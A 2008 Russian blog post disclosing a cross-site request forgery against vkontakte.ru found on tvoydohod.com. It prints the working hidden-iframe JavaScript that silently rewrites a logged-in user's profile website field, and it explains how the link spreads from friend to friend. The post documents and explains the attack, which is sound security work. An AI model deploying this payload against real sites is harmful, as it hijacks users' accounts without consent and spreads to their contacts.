понедельник, марта 17, 2008

IT-Безопасность: CSRF на vkontakte.ru

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
var html;
html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле "Веб-сайт" станет равным tvoydohod.com.

Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе... И т д.



Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.
Отписал в тех-поддержку, где столкнулся с "Это не баг!", "Не кликайте по подозрительным ссылкам!" и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом "вирусе", который живет целиком в соц-сети =)

Автор: kenshin
Взято отсюда

Комментариев нет: